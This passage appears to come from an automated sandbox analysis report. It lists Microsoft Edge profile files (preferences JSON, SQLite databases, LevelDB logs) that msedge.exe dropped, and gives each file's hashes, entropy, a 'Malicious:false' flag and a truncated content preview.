                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):40504
                                                                                                                                                                                                                                                                Entropy (8bit):5.561177469368286
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:lIZM6H7pLGLhYqWPwufOS8F1+UoAYDCx9Tuqh0VfUC9xbog/OVQZMDUgIrw1VOOl:lIZM6BchYqWPwufOSu1ja9ZM4gZ1VOLs
                                                                                                                                                                                                                                                                MD5:CD41E63E5A95E64371764794D409D051
                                                                                                                                                                                                                                                                SHA1:170114D777207188170F4862AC772259290936D3
                                                                                                                                                                                                                                                                SHA-256:3F4ECE4A134DF4D15E8891D05991E0808962233C0D46B036EDEC3D3EBE81D27C
                                                                                                                                                                                                                                                                SHA-512:AC105FFEB1ADE575D302147F8A83E5771F39AA9AB6D6AD47552B92E1D37D4F0983BFCA61B9E1E63D11F6ECD558642BCA47387841FF7CAF8AB7113C2D3F61DD3A
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378826829511448","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378826829511448","location":5,"ma

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):28672
                                                                                                                                                                                                                                                                Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\f35775e1-feae-424d-b484-e264ecdea40f.tmp

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):25012
                                                                                                                                                                                                                                                                Entropy (8bit):5.567227888340905
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:llvMcqWPwufTS8F1+UoAYDCx9Tuqh0VfUC9xbog/OVWDULIrwgpXtun:llvMcqWPwufTSu1jaP4LZgtE
                                                                                                                                                                                                                                                                MD5:9ED3060A9F39B28EF4CB707645732673
                                                                                                                                                                                                                                                                SHA1:48B40BE9DCB688E3BB3E8BA0945C9268A8231672
                                                                                                                                                                                                                                                                SHA-256:78237730668568C717C167CD7A6ED23E050EBDC52C5A3304CE7FBF6C529D39A6
                                                                                                                                                                                                                                                                SHA-512:B193E592E0F6800008F6545C44CC15A59DAE5818FCD4C7B260B92DB3BA69A924B7CA081D86EFF88BB87E2CD22E228CDA5090B04C6241D1E0D7CEA0FAA4CD9F17
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378826829511448","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378826829511448","location":5,"ma

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\fe338e16-3d9c-4960-acf1-8a9190ee8a69.tmp

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (17193), with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):17199
                                                                                                                                                                                                                                                                Entropy (8bit):5.498147058444482
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:st5PGQSu4Cs4ZXV+Vl1xSqDQ3iQrTebGCQwX37NIl:s7OXuxZwnCX3TGbGx6i
                                                                                                                                                                                                                                                                MD5:0E84AE660086157F5445ED108C11023F
                                                                                                                                                                                                                                                                SHA1:88BA1C64AEEEBCD4D58F16E44C9D4884D684EBF0
                                                                                                                                                                                                                                                                SHA-256:928635375E71FD137781484FA01D8D6F52FA08F9A67C6AA1B2BF4EE8FA280611
                                                                                                                                                                                                                                                                SHA-512:2565441AF62BB50D513897E670D9C126FCC4AB3589413B25E7765143DF5C61A347BFEDDFEB0B40C6876016D836153615185FA14CE393BD15F7A3AA583491F3C9
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378826830031057","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                                                Entropy (8bit):0.10183417230719521
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:Gu09s809sq89XCChslotGLNl0ml/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl0:+qdqqspEjVl/PnnnnnnnnnnnvoQ/Eou
                                                                                                                                                                                                                                                                MD5:138829710F92125DABC4F86A0F720B60
                                                                                                                                                                                                                                                                SHA1:E94234025A7DF8F2A53F78AC0ECD438CA01B604D
                                                                                                                                                                                                                                                                SHA-256:D245280C8EBFD83F46A7EF5252B279342753EDE6C6E430F6D1FA76A164344769
                                                                                                                                                                                                                                                                SHA-512:61AF5D4C404E9A487660E11A83FF7D837BFCDDA2190A13632D5D8E31A5FEDE020A58CB828F4CBCC19D4FB1D7B77467FD71DF9A8F054E03750EB964E98B79D9B4
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:..-.............M.......N>.X$>h!.XE6.:..K.D.*b.X..-.............M.......N>.X$>h!.XE6.:..K.D.*b.X........I...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):317272
                                                                                                                                                                                                                                                                Entropy (8bit):0.8893485824905389
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:S4VR8RpRP+pRLmURdxFRcWpuRn6yCRObPRQfuRl6t1tRzyv8cyFy6wyQym+y/xya:NROT
                                                                                                                                                                                                                                                                MD5:0153871C0ACAB581F19FAEC16C416200
                                                                                                                                                                                                                                                                SHA1:858C2A41EA31B303DDC76A76ECE3D74896AB968F
                                                                                                                                                                                                                                                                SHA-256:8FA1B7EA957AC651724F612E919FD0A6923977AF2799EC62055478BA967EF46E
                                                                                                                                                                                                                                                                SHA-512:1E9F61852C8EA4E263B33EA4DF7D70C3B2C797ABCF956BF265A636187716765B19770C41A59718927129187F6E664DACCA79A0DFD1A353EA9237F54AE358AAB4
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:7....-...........XE6.:...,\...n..........XE6.:...^.J.~.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):419
                                                                                                                                                                                                                                                                Entropy (8bit):3.697458451967152
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:/XntM+dll3sedhO38WrOuuuuuuuuuuuu/PsedhOE:lllc8zWrOuuuuuuuuuuuus8l
                                                                                                                                                                                                                                                                MD5:AA068476C16A3770D3ABC72F3C997CC6
                                                                                                                                                                                                                                                                SHA1:DD85A1896F26C9822903CEAB4C39F0E9125C7390
                                                                                                                                                                                                                                                                SHA-256:C02FB6242657931DE9E5F945CA295E84C9768B8FA0191F3ED45E6A416FD76DC6
                                                                                                                                                                                                                                                                SHA-512:A5DB8CC627B01EFB75F7DFA9AD0E834A1AA5E25F835C9F8054EC61C5FDF2C12CDF54386414F48A0856D098DA63813EB86433564D5CAF8A376C2560A98E9B6790
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:A..r.................20_1_1...1.,U.................20_1_1...1....0................39_config..........6.....n ....1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=.................>0................39_config..........6.....n ...1

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):321
                                                                                                                                                                                                                                                                Entropy (8bit):5.224924884181609
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7A3Rdv+q2PCHhJ23oH+TcwtfrK+IFUt8OA3RdIWZmw+OA3RNiVkwOCHhJ23oH+Tp:7adv+vBYeb23FUt8OadIW/+OagV56Yet
                                                                                                                                                                                                                                                                MD5:FE337D30E21D18CF6F47AC635254D455
                                                                                                                                                                                                                                                                SHA1:3957B3C1FB08834FE372218B41890EE9A363DDE6
                                                                                                                                                                                                                                                                SHA-256:77D2FAB91438106E9BCE914BB5EC2E4573B422E3884AA2E81200470AE5912A44
                                                                                                                                                                                                                                                                SHA-512:483E10F1FEA7F1E6A626C83FDDBEDBF32BC723D2FB1DAED685C475AA9A0E3DE509C9F633D7D01918624F74755A9658EB7D8BBAAC4ED8D0E37DEC2B4E22119971
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:10.148 dec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/16-07:47:10.148 dec Recovering log #3.2024/12/16-07:47:10.149 dec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):321
                                                                                                                                                                                                                                                                Entropy (8bit):5.224924884181609
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7A3Rdv+q2PCHhJ23oH+TcwtfrK+IFUt8OA3RdIWZmw+OA3RNiVkwOCHhJ23oH+Tp:7adv+vBYeb23FUt8OadIW/+OagV56Yet
                                                                                                                                                                                                                                                                MD5:FE337D30E21D18CF6F47AC635254D455
                                                                                                                                                                                                                                                                SHA1:3957B3C1FB08834FE372218B41890EE9A363DDE6
                                                                                                                                                                                                                                                                SHA-256:77D2FAB91438106E9BCE914BB5EC2E4573B422E3884AA2E81200470AE5912A44
                                                                                                                                                                                                                                                                SHA-512:483E10F1FEA7F1E6A626C83FDDBEDBF32BC723D2FB1DAED685C475AA9A0E3DE509C9F633D7D01918624F74755A9658EB7D8BBAAC4ED8D0E37DEC2B4E22119971
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:10.148 dec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/16-07:47:10.148 dec Recovering log #3.2024/12/16-07:47:10.149 dec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):753
                                                                                                                                                                                                                                                                Entropy (8bit):4.037333775091125
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvBs:G0nYUtypD3RUovhC+lvBOL+t3IvBs
                                                                                                                                                                                                                                                                MD5:C5675C35B320A0898802E1ECFD3476E8
                                                                                                                                                                                                                                                                SHA1:B6CA1C2EE1340662A7B495778416988006748327
                                                                                                                                                                                                                                                                SHA-256:8E60BB9B60A9A242D016CF5425FF3D76A94911F197B3E4AB08A417E39C2832A5
                                                                                                                                                                                                                                                                SHA-512:DAA3E9FADF4F69A88600460F48116E50BCE1C979E4AFA7114D1B8CCEC6626520CC3725D0BB845E0FCC8587A8690D4AC495C138AB1AAC2981CAEB9C485FA0CC67
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.|.................9_.....'\c..................9_.......f-.................__global... .|.&R.................__global... ./....................__global... ..T...................__global... .

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):339
                                                                                                                                                                                                                                                                Entropy (8bit):5.184573808214086
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7Al9+q2PCHhJ23oH+TcwtfrzAdIFUt8OAVXWZmw+OAViVkwOCHhJ23oH+Tcwtfrm:7c9+vBYeb9FUt8O6XW/+O6iV56Yeb2J
                                                                                                                                                                                                                                                                MD5:2BC4D8E68F720692B4830D7486BBCEF2
                                                                                                                                                                                                                                                                SHA1:C825D0C82236FBEE01EB9F0660CBBD5F55A699C9
                                                                                                                                                                                                                                                                SHA-256:62F0F937E24768CB52ACD7441484086D1E69F572B823E0BF37B12193228120AC
                                                                                                                                                                                                                                                                SHA-512:5667ED11743BCC6D5F1C69A8335A5C1E7D415456230A2BE071350CA77F2746D0BCC8916D0337E53E4D6C71999B0BD18EE4441A6227BCD7642ECDA3F0D4858623
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:10.045 dec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/16-07:47:10.046 dec Recovering log #3.2024/12/16-07:47:10.046 dec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):339
                                                                                                                                                                                                                                                                Entropy (8bit):5.184573808214086
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7Al9+q2PCHhJ23oH+TcwtfrzAdIFUt8OAVXWZmw+OAViVkwOCHhJ23oH+Tcwtfrm:7c9+vBYeb9FUt8O6XW/+O6iV56Yeb2J
                                                                                                                                                                                                                                                                MD5:2BC4D8E68F720692B4830D7486BBCEF2
                                                                                                                                                                                                                                                                SHA1:C825D0C82236FBEE01EB9F0660CBBD5F55A699C9
                                                                                                                                                                                                                                                                SHA-256:62F0F937E24768CB52ACD7441484086D1E69F572B823E0BF37B12193228120AC
                                                                                                                                                                                                                                                                SHA-512:5667ED11743BCC6D5F1C69A8335A5C1E7D415456230A2BE071350CA77F2746D0BCC8916D0337E53E4D6C71999B0BD18EE4441A6227BCD7642ECDA3F0D4858623
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:10.045 dec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/16-07:47:10.046 dec Recovering log #3.2024/12/16-07:47:10.046 dec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):120
                                                                                                                                                                                                                                                                Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):13
                                                                                                                                                                                                                                                                Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:117.0.2045.47

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):44170
                                                                                                                                                                                                                                                                Entropy (8bit):6.090597779558895
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kjCLmZt4+tR96hOxq4gFkFDlwWE7RTupzKscDX//NPm:z/Ps+wsI7ynttGhOxqQoRTuiVIos
                                                                                                                                                                                                                                                                MD5:F378B34C04A398BE5D454BF645831CAF
                                                                                                                                                                                                                                                                SHA1:EFC16B97C3C04F279D56872270FEE2CCD6D2B7FA
                                                                                                                                                                                                                                                                SHA-256:7CF14647DCA11B0084EA80A3632DF58F253660B94ACA2DAA6D7F2CECE97E8E4F
                                                                                                                                                                                                                                                                SHA-512:09D4646A44E063B8491F24046D01BE62BC2709BB5FCAEE9A83C99F05AB742FFBA7265D28D9F7788A6CF66A10DB011B40D92AC521C7C718138A386B5F40A2009D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF34816.TMP (copy)

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):44170
                                                                                                                                                                                                                                                                Entropy (8bit):6.090597779558895
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kjCLmZt4+tR96hOxq4gFkFDlwWE7RTupzKscDX//NPm:z/Ps+wsI7ynttGhOxqQoRTuiVIos
                                                                                                                                                                                                                                                                MD5:F378B34C04A398BE5D454BF645831CAF
                                                                                                                                                                                                                                                                SHA1:EFC16B97C3C04F279D56872270FEE2CCD6D2B7FA
                                                                                                                                                                                                                                                                SHA-256:7CF14647DCA11B0084EA80A3632DF58F253660B94ACA2DAA6D7F2CECE97E8E4F
                                                                                                                                                                                                                                                                SHA-512:09D4646A44E063B8491F24046D01BE62BC2709BB5FCAEE9A83C99F05AB742FFBA7265D28D9F7788A6CF66A10DB011B40D92AC521C7C718138A386B5F40A2009D
                                                                                                                                                                                                                                                                Malicious:false
